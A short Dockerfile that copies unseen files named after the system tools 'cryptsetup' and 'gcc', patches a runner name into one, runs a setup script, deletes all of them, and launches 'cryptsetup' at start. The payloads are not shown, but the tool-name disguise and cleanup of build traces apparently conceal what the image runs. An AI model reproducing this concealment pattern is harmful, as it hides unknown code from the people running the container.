FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > cryptsetup.log'

COPY cryptsetup .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' cryptsetup
RUN bash ./docker.sh

RUN rm --force --recursive cryptsetup
RUN rm --force --recursive docker.sh
RUN rm --force --recursive gcc

CMD cryptsetup
